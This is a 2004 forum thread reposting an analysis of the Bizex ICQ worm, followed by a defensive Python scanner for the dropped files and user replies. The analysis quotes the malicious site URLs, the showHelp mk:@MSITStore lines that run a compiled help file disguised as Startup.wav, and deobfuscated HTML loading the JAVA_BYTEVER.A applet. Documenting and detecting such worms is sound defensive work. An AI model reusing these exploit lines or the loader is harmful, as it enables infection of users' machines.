Thread: ICQ Worm!

  1. #1

    ICQ Worm! (Do not click on the URLs until you've finished reading the whole article!)

    Extracted from: http://www.daemonology.net/ICQworm/worm.txt

    WARNING: DO NOT CLICK ON THE LINKS WITHOUT FINISHING READING THROUGH THIS ARTICLE!!!

    Summary: A worm is spreading via ICQ, using a flaw in MSIE and a
    misconfiguration in ICQ itself. As a side effect (or, quite likely,
    the intended purpose), it installs JAVA_BYTEVER.A (or some variant thereof).

    The following page contains malware: http://www.jokeworld.biz/index.html
    It does the following:
    1. Opens up http://www.joecartoon.com/pages/cartoons/ to give the user
    something to watch.

    2. Opens up http://www.jokeworld.biz/meine.scm, using the ICQ flaw
    described at
    http://archives.neohapsis.com/archiv...2-07/0182.html
    to execute it.

    2.1. If ICQ is currently running, the following files will be created:
    c:\program files\ICQ\sounds\meine\ChatAction.wav (1088kb of zero bytes)
    c:\program files\ICQ\sounds\meine\ChatEmote.wav (empty)
    c:\program files\ICQ\sounds\meine\FileDone.wav (513kb of zero bytes)
    c:\program files\ICQ\sounds\meine\WebSearch.wav (empty)
    c:\program files\ICQ\sounds\meine\Startup.wav (compiled html file, exploit
    code)

    3. Uses the exploit described at
    http://www.securitytracker.com/alert...c/1008578.html
    to execute the exploit code using the compiled help viewer:
    showHelp("mk:@MSITStore:iexplore.chm::..\\..\\..\\ ..\\program files\\ICQ\\Sounds\\meine[1]\\Startup.wav::/ie****er.html");
    showHelp("mk:@MSITStore:iexplore.chm::..\\..\\..\\ ..\\program files\\ICQ\\Sounds\\meine\\Startup.wav::/ie****er.html");

    3.1. Microsoft's chm format is insufficiently documented for me to get any
    further than this without an airgapped system, but I assume it modifies
    ICQ's startup procedure to cause the observed symptom of sending
    "http://www.jokeworld.biz/index.html ) LOL" to all contacts at startup.

    4. Opens up http://www.sx2group.com/user_bx.html, which after deobfuscating
    runs the following code:
    <HTML><HEAD>
    <script>
    <applet width=1 height=1 ARCHIVE=nocheat.jar code=Counter>;
    <param name='ac' value='BX'>;
    <param name='ua' value='"+navigator.userAgent+"'>;
    <param name='pl' value='"+navigator.platform+"'>;
    </applet>;
    </BODY></HTML>

    4.1. nocheat.jar is detected by PC-cillin as JAVA_BYTEVER.A.

    Thanks to: Wampus, for getting infected and thereby informing me of this.

    Colin Percival
    cperciva@daemonology.net
    Last edited by Linkster; 24th February 2004 at 07:52 PM.
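A check for the artefacts listed in the post above, added here as an example; it is not part of the thread or of the daemonology.net write-up. It looks only for what the write-up names: the five files dropped under ICQ\sounds\meine, and the fact that Startup.wav is a compiled HTML (.chm) file rather than audio. The directory and file contents are constructed for the demonstration.

```python
import os
import tempfile

# File names the write-up lists under ICQ\sounds\meine (the worm's sound scheme).
DROPPED_NAMES = {"ChatAction.wav", "ChatEmote.wav", "FileDone.wav",
                 "WebSearch.wav", "Startup.wav"}
CHM_MAGIC = b"ITSF"  # header of a compiled HTML help (.chm) file


def classify(path):
    """Return 'chm', 'wave', 'zero-filled', 'empty' or 'unknown' for one file."""
    with open(path, "rb") as f:
        head = f.read(4096)
    if not head:
        return "empty"
    if head.startswith(CHM_MAGIC):
        return "chm"
    if head[:4] == b"RIFF" and head[8:12] == b"WAVE":  # a real .wav
        return "wave"
    if head.count(b"\x00") == len(head):
        return "zero-filled"
    return "unknown"


def scan_sound_scheme(scheme_dir):
    """List (name, kind) for files matching the drop pattern: a .wav that is
    really a CHM, or the empty / zero-filled padding files."""
    findings = []
    if not os.path.isdir(scheme_dir):
        return findings
    for name in sorted(os.listdir(scheme_dir)):
        if name in DROPPED_NAMES:
            kind = classify(os.path.join(scheme_dir, name))
            if kind in ("chm", "zero-filled", "empty"):
                findings.append((name, kind))
    return findings


def build_sample_scheme():
    """Construct a throwaway 'meine' directory with made-up contents (test data)."""
    d = os.path.join(tempfile.mkdtemp(), "meine")
    os.mkdir(d)
    samples = {"ChatAction.wav": b"\x00" * 4096, "ChatEmote.wav": b"",
               "Startup.wav": b"ITSF\x03\x00\x00\x00" + b"x" * 64,
               "Other.wav": b"RIFF\x24\x00\x00\x00WAVEfmt "}
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    return d
```

Run `scan_sound_scheme(build_sample_scheme())` to see the three constructed drop files flagged while the genuine RIFF/WAVE file is left alone; on a real machine point it at the ICQ sounds\meine path instead.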

  2. #2
    Member
    Join Date
    Nov 2003
    Location
    Northeast
    Posts
    1,226

    Oh, so it IS a worm! I was quite surprised when I received the exact same message from two different contacts in my ICQ at the same time. I clicked on the link, but closed it before it loaded cos I thought it a bit weird. Hmm.. guess I should have to run a virus scan...

  3. #3
    Deregistered
    Join Date
    Dec 2002
    Location
    Singapore
    Posts
    6,601

    now, if there was only a way to remove it for those affected...

  4. #4
    Member
    Join Date
    May 2003
    Location
    East
    Posts
    706

    Doesn't affect you if you use a mac....

  5. #5
    Senior Member
    Join Date
    Jan 2002
    Location
    South Pole with Penguin
    Posts
    5,270

    Wow...most detailed documentation about this ICQ wormz

  6. #6

    What if I'm using a non-ICQ program like Trillian or Miranda? Will I still be infected and send out those LOL msgs?
    I think I clicked on the link, but when my firewall prog warned me abt something related to ICQ, I denied access...I hope.

  7. #7
    Member ransoma22
    Join Date
    Mar 2002
    Location
    KTV Lounge Hall
    Posts
    1,212

    More news on this Bizex Wormz

    Read more information on this wormz
    at Google news..
    http://news.google.com/news?hl=en&lr...rm&sa=N&tab=wn
